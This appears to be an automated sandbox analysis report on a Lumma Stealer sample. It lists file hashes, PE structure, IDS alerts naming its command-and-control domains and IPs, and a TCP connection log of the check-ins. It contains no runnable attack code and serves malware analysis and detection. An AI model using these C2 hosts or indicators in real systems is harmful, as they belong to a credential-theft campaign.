                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):4683
                                                                                    Entropy (8bit):4.459818688627694
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:cvIwWl8zs1Jg77aI9XsWpW8VYlYm8M4Jhofo6FN+q8bsXaeSararMd:uIjfPI71F7VJJh0pgsLSararMd
                                                                                    MD5:5207418D1D894AF20F263ADD9D11DA2E
                                                                                    SHA1:8B45ADAD40348817768B21DE7D2D2AC7588AC95D
                                                                                    SHA-256:46FB293A260BB9A6C490DDE107FBF0685F369AC48C6897A9EDDC82B6DDD2B419
                                                                                    SHA-512:C897BDA03BB212886F2AA593CED487717517F3A8049E496B64001CAB7956E4A5D3FAE25FFB5C0A073BF4B08B8869A5EA3415ED3594C7621AF1A87699126C01AF
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="542523" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                    Process:C:\Users\user\Desktop\SoftWare(1).exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):42
                                                                                    Entropy (8bit):4.0050635535766075
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                                    MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                                    SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                                    SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                                    SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                                    Malicious:true
                                                                                    Reputation:high, very likely benign file
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                                                                                    Process:C:\Users\user\Desktop\SoftWare(1).exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):553984
                                                                                    Entropy (8bit):7.138411655503185
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:3kiwcsWJ4JzA4p/cRfXdlBw9oxW7XzD/+b:3kiwcOA0AXw9oxQDD/+
                                                                                    MD5:FB2B76C35600E9D1F183024B3A825DB2
                                                                                    SHA1:4AF1940190E185AC073371ED07394E4462C3B06F
                                                                                    SHA-256:A186F87F03A39B500B1FEC26F1AE4D45ECA026BAAE2335878104DA6ED75550D9
                                                                                    SHA-512:089C544708F58CF4FEC66EE31FAEED8C35275AA49D81C020379FDDE8157D9F18E6159F9521C4B32B7F74549C9403A99ED699752B90C6291BAB174B7F1B1B3841
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    Reputation:low
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............................S................s...........4.......4......4...........4.....4.....Rich...........................PE..L......g...........!...&............4.....................................................@.........................P5..x....5..<....................................(..............................0(..@...............T............................text.............................. ..`.rdata...m.......n..................@..@.data....=...@...2...&..............@....reloc...............X..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                    Category:dropped
                                                                                    Size (bytes):1835008
                                                                                    Entropy (8bit):4.466397401139494
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:zIXfpi67eLPU9skLmb0b4qWSPKaJG8nAgejZMMhA2gX4WABl0uNMdwBCswSb/:kXD94qWlLZMM6YFHq+/
                                                                                    MD5:2E459293004FF60C8FF563F05F889CA6
                                                                                    SHA1:5883AD71345B8A078D02CA0A08CEB19D4ABE9AA0
                                                                                    SHA-256:F1E9A6E4719C5588919842D8F3DE01EF20842A82E21746036340D332E5DE4E8F
                                                                                    SHA-512:FE7DF14DCF49B2F2BE91277D80B144DD643CB63F20CE7EC2117F1A2E95C7E103A8166AB4D75AFAA8F7F210439769DF84AF92989FA2F91467BE8EF191A249808B
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...S..................................................................................................................................................................................................................................................................................................................................................g........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Entropy (8bit):7.889221016357341
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                    • Win32 Executable (generic) a (10002005/4) 49.96%
                                                                                    • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                    File name:SoftWare(1).exe
                                                                                    File size:359'936 bytes
                                                                                    MD5:3adc9c7905f10b8c2c0b0bb7826b67a2
                                                                                    SHA1:e7861a02d2beac0caa3c00eb11a1b84fb54437db
                                                                                    SHA256:60035aa91fc8436120e0d471f046a14fd45191f5ad56bef0bb3c7688c8f0d1ad
                                                                                    SHA512:bd7045b7fcf61dc89beeee0b251554a82bfdbd70c5e535011b5b71f94bd548e17ed68af012a9f94e9a14602e83f00b8eba926af66dd5790a09dc17678e9caf70
                                                                                    SSDEEP:6144:HKTh0X7iFpDBiW9+q7p8BF47jC3gOT8EY5RyN2vOYU4GtrLu61EGMIZqtIHjMbs:eh0riFHiWpC3gOwt5RrOYvGtrLu6vZC4
                                                                                    TLSH:A274CF9D726032DFC857D4719EA81CA8FA6178BB931F4127A06716E9EE4C897CF140F2
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..................................... ....@.. ....................................@................................
                                                                                    Icon Hash:90cececece8e8eb0
                                                                                    Entrypoint:0x45e00a
                                                                                    Entrypoint Section:
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows cui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x670C1A9B [Sun Oct 13 19:08:11 2024 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                    Instruction
                                                                                    jmp dword ptr [0045E000h]
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x507d00x4b.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x5a0000x740.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x5c0000xc.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x5e0000x8
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x500000x48.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    'H{_AE0x20000x4dbf80x4dc0011d08a79282b4df81ab9f84adde3cc6dFalse1.0003328476688103data7.999398017019204IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .text0x500000x91a00x9200dd29f79cc4d125fcf3c26e46306133dfFalse0.3909193065068493data4.718375229378975IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rsrc0x5a0000x7400x8004d8e7726045b572f2985bbde8ceda24cFalse0.3984375data3.8714481895570363IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0x5c0000xc0x20031373f9c6aeda5023f8c8409dbb92c77False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                    0x5e0000x100x2005a44ccc84cdb8ea884f1e29fe88ed2baFalse0.044921875Applesoft BASIC program data, first line number 50.12227588125913882IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_VERSION0x5a0a00x4b4data0.4210963455149502
                                                                                    RT_MANIFEST0x5a5540x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
                                                                                    DLLImport
                                                                                    mscoree.dll_CorExeMain
                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2024-10-14T05:01:01.951403+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730104.21.28.222443TCP
                                                                                    2024-10-14T05:01:01.951403+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730104.21.28.222443TCP
                                                                                    2024-10-14T05:01:01.983945+02002056570ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs)1192.168.2.4589821.1.1.153UDP
                                                                                    2024-10-14T05:01:02.495251+02002056571ET MALWARE Observed Win32/Lumma Stealer Related Domain (mathcucom .sbs in TLS SNI)1192.168.2.449731188.114.96.3443TCP
                                                                                    2024-10-14T05:01:02.976284+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449731188.114.96.3443TCP
                                                                                    2024-10-14T05:01:02.976284+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731188.114.96.3443TCP
                                                                                    2024-10-14T05:01:02.992424+02002056568ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs)1192.168.2.4514661.1.1.153UDP
                                                                                    2024-10-14T05:01:03.030095+02002056566ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs)1192.168.2.4617791.1.1.153UDP
                                                                                    2024-10-14T05:01:03.524458+02002056567ET MALWARE Observed Win32/Lumma Stealer Related Domain (enlargkiw .sbs in TLS SNI)1192.168.2.449732172.67.152.13443TCP
                                                                                    2024-10-14T05:01:03.964120+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449732172.67.152.13443TCP
                                                                                    2024-10-14T05:01:03.964120+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449732172.67.152.13443TCP
                                                                                    2024-10-14T05:01:03.965677+02002056564ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs)1192.168.2.4638201.1.1.153UDP
                                                                                    2024-10-14T05:01:04.472053+02002056565ET MALWARE Observed Win32/Lumma Stealer Related Domain (resinedyw .sbs in TLS SNI)1192.168.2.449733172.67.205.156443TCP
                                                                                    2024-10-14T05:01:04.881092+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449733172.67.205.156443TCP
                                                                                    2024-10-14T05:01:04.881092+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449733172.67.205.156443TCP
                                                                                    2024-10-14T05:01:04.964186+02002056562ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs)1192.168.2.4604101.1.1.153UDP
                                                                                    2024-10-14T05:01:05.552086+02002056563ET MALWARE Observed Win32/Lumma Stealer Related Domain (vennurviot .sbs in TLS SNI)1192.168.2.449734104.21.46.170443TCP
                                                                                    2024-10-14T05:01:06.007757+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449734104.21.46.170443TCP
                                                                                    2024-10-14T05:01:06.007757+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449734104.21.46.170443TCP
                                                                                    2024-10-14T05:01:06.027035+02002056560ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs)1192.168.2.4511391.1.1.153UDP
                                                                                    2024-10-14T05:01:06.541867+02002056561ET MALWARE Observed Win32/Lumma Stealer Related Domain (ehticsprocw .sbs in TLS SNI)1192.168.2.449735104.21.30.221443TCP
                                                                                    2024-10-14T05:01:06.978810+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449735104.21.30.221443TCP
                                                                                    2024-10-14T05:01:06.978810+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449735104.21.30.221443TCP
                                                                                    2024-10-14T05:01:06.988332+02002056558ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs)1192.168.2.4553681.1.1.153UDP
                                                                                    2024-10-14T05:01:07.481620+02002056559ET MALWARE Observed Win32/Lumma Stealer Related Domain (condifendteu .sbs in TLS SNI)1192.168.2.449736172.67.141.136443TCP
                                                                                    2024-10-14T05:01:07.883701+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449736172.67.141.136443TCP
                                                                                    2024-10-14T05:01:07.883701+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449736172.67.141.136443TCP
                                                                                    2024-10-14T05:01:07.888189+02002056556ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs)1192.168.2.4495331.1.1.153UDP
                                                                                    2024-10-14T05:01:08.433757+02002056557ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawwyobstacw .sbs in TLS SNI)1192.168.2.449737188.114.96.3443TCP
                                                                                    2024-10-14T05:01:08.867229+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449737188.114.96.3443TCP
                                                                                    2024-10-14T05:01:08.867229+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449737188.114.96.3443TCP
                                                                                    2024-10-14T05:01:10.165473+02002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.449738104.102.49.254443TCP
                                                                                    2024-10-14T05:01:11.254161+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449739104.21.53.8443TCP
                                                                                    2024-10-14T05:01:11.254161+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449739104.21.53.8443TCP
                                                                                    2024-10-14T05:01:12.869564+02002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449740104.21.53.8443TCP
                                                                                    2024-10-14T05:01:12.869564+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449740104.21.53.8443TCP
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Oct 14, 2024 05:01:00.951874018 CEST49730443192.168.2.4104.21.28.222
                                                                                    Oct 14, 2024 05:01:00.951936960 CEST44349730104.21.28.222192.168.2.4
                                                                                    Oct 14, 2024 05:01:00.952174902 CEST49730443192.168.2.4104.21.28.222
                                                                                    Oct 14, 2024 05:01:00.954865932 CEST49730443192.168.2.4104.21.28.222
                                                                                    Oct 14, 2024 05:01:00.954946995 CEST44349730104.21.28.222192.168.2.4
                                                                                    Oct 14, 2024 05:01:01.438234091 CEST44349730104.21.28.222192.168.2.4
                                                                                    Oct 14, 2024 05:01:01.438441038 CEST49730443192.168.2.4104.21.28.222
                                                                                    Oct 14, 2024 05:01:01.441217899 CEST49730443192.168.2.4104.21.28.222
                                                                                    Oct 14, 2024 05:01:01.441272974 CEST44349730104.21.28.222192.168.2.4
                                                                                    Oct 14, 2024 05:01:01.441728115 CEST44349730104.21.28.222192.168.2.4
                                                                                    Oct 14, 2024 05:01:01.487505913 CEST49730443192.168.2.4104.21.28.222
                                                                                    Oct 14, 2024 05:01:01.531966925 CEST49730443192.168.2.4104.21.28.222
                                                                                    Oct 14, 2024 05:01:01.532001019 CEST49730443192.168.2.4104.21.28.222
                                                                                    Oct 14, 2024 05:01:01.532236099 CEST44349730104.21.28.222192.168.2.4
                                                                                    Oct 14, 2024 05:01:01.951497078 CEST44349730104.21.28.222192.168.2.4
                                                                                    Oct 14, 2024 05:01:01.951740026 CEST44349730104.21.28.222192.168.2.4
                                                                                    Oct 14, 2024 05:01:01.951832056 CEST49730443192.168.2.4104.21.28.222
                                                                                    Oct 14, 2024 05:01:01.960669994 CEST49730443192.168.2.4104.21.28.222
                                                                                    Oct 14, 2024 05:01:01.960736036 CEST44349730104.21.28.222192.168.2.4
                                                                                    Oct 14, 2024 05:01:01.999376059 CEST49731443192.168.2.4188.114.96.3
                                                                                    Oct 14, 2024 05:01:01.999440908 CEST44349731188.114.96.3192.168.2.4
                                                                                    Oct 14, 2024 05:01:01.999512911 CEST49731443192.168.2.4188.114.96.3
                                                                                    Oct 14, 2024 05:01:01.999905109 CEST49731443192.168.2.4188.114.96.3
                                                                                    Oct 14, 2024 05:01:01.999917984 CEST44349731188.114.96.3192.168.2.4
                                                                                    Oct 14, 2024 05:01:02.495148897 CEST44349731188.114.96.3192.168.2.4
                                                                                    Oct 14, 2024 05:01:02.495250940 CEST49731443192.168.2.4188.114.96.3
                                                                                    Oct 14, 2024 05:01:02.517446041 CEST49731443192.168.2.4188.114.96.3
                                                                                    Oct 14, 2024 05:01:02.517467976 CEST44349731188.114.96.3192.168.2.4
                                                                                    Oct 14, 2024 05:01:02.518460989 CEST44349731188.114.96.3192.168.2.4
                                                                                    Oct 14, 2024 05:01:02.519864082 CEST49731443192.168.2.4188.114.96.3
                                                                                    Oct 14, 2024 05:01:02.519898891 CEST49731443192.168.2.4188.114.96.3
                                                                                    Oct 14, 2024 05:01:02.520198107 CEST44349731188.114.96.3192.168.2.4
                                                                                    Oct 14, 2024 05:01:02.976335049 CEST44349731188.114.96.3192.168.2.4
                                                                                    Oct 14, 2024 05:01:02.976573944 CEST44349731188.114.96.3192.168.2.4
                                                                                    Oct 14, 2024 05:01:02.976701021 CEST49731443192.168.2.4188.114.96.3
                                                                                    Oct 14, 2024 05:01:02.976785898 CEST49731443192.168.2.4188.114.96.3
                                                                                    Oct 14, 2024 05:01:02.976834059 CEST44349731188.114.96.3192.168.2.4
                                                                                    Oct 14, 2024 05:01:02.976866007 CEST49731443192.168.2.4188.114.96.3
                                                                                    Oct 14, 2024 05:01:02.976881027 CEST44349731188.114.96.3192.168.2.4
                                                                                    Oct 14, 2024 05:01:03.043523073 CEST49732443192.168.2.4172.67.152.13
                                                                                    Oct 14, 2024 05:01:03.043596029 CEST44349732172.67.152.13192.168.2.4
                                                                                    Oct 14, 2024 05:01:03.043678999 CEST49732443192.168.2.4172.67.152.13
                                                                                    Oct 14, 2024 05:01:03.044002056 CEST49732443192.168.2.4172.67.152.13
                                                                                    Oct 14, 2024 05:01:03.044027090 CEST44349732172.67.152.13192.168.2.4
                                                                                    Oct 14, 2024 05:01:03.524369955 CEST44349732172.67.152.13192.168.2.4
                                                                                    Oct 14, 2024 05:01:03.524457932 CEST49732443192.168.2.4172.67.152.13
                                                                                    Oct 14, 2024 05:01:03.526465893 CEST49732443192.168.2.4172.67.152.13
                                                                                    Oct 14, 2024 05:01:03.526515961 CEST44349732172.67.152.13192.168.2.4
                                                                                    Oct 14, 2024 05:01:03.526873112 CEST44349732172.67.152.13192.168.2.4
                                                                                    Oct 14, 2024 05:01:03.528198957 CEST49732443192.168.2.4172.67.152.13
                                                                                    Oct 14, 2024 05:01:03.528249025 CEST49732443192.168.2.4172.67.152.13
                                                                                    Oct 14, 2024 05:01:03.528315067 CEST44349732172.67.152.13192.168.2.4
                                                                                    Oct 14, 2024 05:01:03.964096069 CEST44349732172.67.152.13192.168.2.4
                                                                                    Oct 14, 2024 05:01:03.964339018 CEST44349732172.67.152.13192.168.2.4
                                                                                    Oct 14, 2024 05:01:03.964437962 CEST49732443192.168.2.4172.67.152.13
                                                                                    Oct 14, 2024 05:01:03.964519978 CEST49732443192.168.2.4172.67.152.13
                                                                                    Oct 14, 2024 05:01:03.964519978 CEST49732443192.168.2.4172.67.152.13
                                                                                    Oct 14, 2024 05:01:03.964565039 CEST44349732172.67.152.13192.168.2.4
                                                                                    Oct 14, 2024 05:01:03.964591980 CEST44349732172.67.152.13192.168.2.4
                                                                                    Oct 14, 2024 05:01:03.978405952 CEST49733443192.168.2.4172.67.205.156
                                                                                    Oct 14, 2024 05:01:03.978496075 CEST44349733172.67.205.156192.168.2.4
                                                                                    Oct 14, 2024 05:01:03.978789091 CEST49733443192.168.2.4172.67.205.156
                                                                                    Oct 14, 2024 05:01:03.978904963 CEST49733443192.168.2.4172.67.205.156
                                                                                    Oct 14, 2024 05:01:03.978934050 CEST44349733172.67.205.156192.168.2.4
                                                                                    Oct 14, 2024 05:01:04.471965075 CEST44349733172.67.205.156192.168.2.4
                                                                                    Oct 14, 2024 05:01:04.472053051 CEST49733443192.168.2.4172.67.205.156
                                                                                    Oct 14, 2024 05:01:04.473566055 CEST49733443192.168.2.4172.67.205.156
                                                                                    Oct 14, 2024 05:01:04.473593950 CEST44349733172.67.205.156192.168.2.4
                                                                                    Oct 14, 2024 05:01:04.474085093 CEST44349733172.67.205.156192.168.2.4
                                                                                    Oct 14, 2024 05:01:04.475284100 CEST49733443192.168.2.4172.67.205.156
                                                                                    Oct 14, 2024 05:01:04.475322962 CEST49733443192.168.2.4172.67.205.156
                                                                                    Oct 14, 2024 05:01:04.475470066 CEST44349733172.67.205.156192.168.2.4
                                                                                    Oct 14, 2024 05:01:04.881135941 CEST44349733172.67.205.156192.168.2.4
                                                                                    Oct 14, 2024 05:01:04.881438971 CEST44349733172.67.205.156192.168.2.4
                                                                                    Oct 14, 2024 05:01:04.881532907 CEST49733443192.168.2.4172.67.205.156
                                                                                    Oct 14, 2024 05:01:04.884406090 CEST49733443192.168.2.4172.67.205.156
                                                                                    Oct 14, 2024 05:01:04.884458065 CEST44349733172.67.205.156192.168.2.4
                                                                                    Oct 14, 2024 05:01:04.884489059 CEST49733443192.168.2.4172.67.205.156
                                                                                    Oct 14, 2024 05:01:04.884504080 CEST44349733172.67.205.156192.168.2.4
                                                                                    Oct 14, 2024 05:01:05.027919054 CEST49734443192.168.2.4104.21.46.170
                                                                                    Oct 14, 2024 05:01:05.028003931 CEST44349734104.21.46.170192.168.2.4
                                                                                    Oct 14, 2024 05:01:05.028110027 CEST49734443192.168.2.4104.21.46.170
                                                                                    Oct 14, 2024 05:01:05.039201975 CEST49734443192.168.2.4104.21.46.170
                                                                                    Oct 14, 2024 05:01:05.039238930 CEST44349734104.21.46.170192.168.2.4
                                                                                    Oct 14, 2024 05:01:05.551989079 CEST44349734104.21.46.170192.168.2.4
                                                                                    Oct 14, 2024 05:01:05.552086115 CEST49734443192.168.2.4104.21.46.170
                                                                                    Oct 14, 2024 05:01:05.553720951 CEST49734443192.168.2.4104.21.46.170
                                                                                    Oct 14, 2024 05:01:05.553740978 CEST44349734104.21.46.170192.168.2.4
                                                                                    Oct 14, 2024 05:01:05.554238081 CEST44349734104.21.46.170192.168.2.4
                                                                                    Oct 14, 2024 05:01:05.555490017 CEST49734443192.168.2.4104.21.46.170
                                                                                    Oct 14, 2024 05:01:05.555536032 CEST49734443192.168.2.4104.21.46.170
                                                                                    Oct 14, 2024 05:01:05.555607080 CEST44349734104.21.46.170192.168.2.4
                                                                                    Oct 14, 2024 05:01:06.007812977 CEST44349734104.21.46.170192.168.2.4
                                                                                    Oct 14, 2024 05:01:06.008069038 CEST44349734104.21.46.170192.168.2.4
                                                                                    Oct 14, 2024 05:01:06.008156061 CEST49734443192.168.2.4104.21.46.170
                                                                                    Oct 14, 2024 05:01:06.013461113 CEST49734443192.168.2.4104.21.46.170
                                                                                    Oct 14, 2024 05:01:06.013461113 CEST49734443192.168.2.4104.21.46.170
                                                                                    Oct 14, 2024 05:01:06.013511896 CEST44349734104.21.46.170192.168.2.4
                                                                                    Oct 14, 2024 05:01:06.013539076 CEST44349734104.21.46.170192.168.2.4
                                                                                    Oct 14, 2024 05:01:06.040196896 CEST49735443192.168.2.4104.21.30.221
                                                                                    Oct 14, 2024 05:01:06.040256023 CEST44349735104.21.30.221192.168.2.4
                                                                                    Oct 14, 2024 05:01:06.040334940 CEST49735443192.168.2.4104.21.30.221
                                                                                    Oct 14, 2024 05:01:06.040600061 CEST49735443192.168.2.4104.21.30.221
                                                                                    Oct 14, 2024 05:01:06.040683031 CEST44349735104.21.30.221192.168.2.4
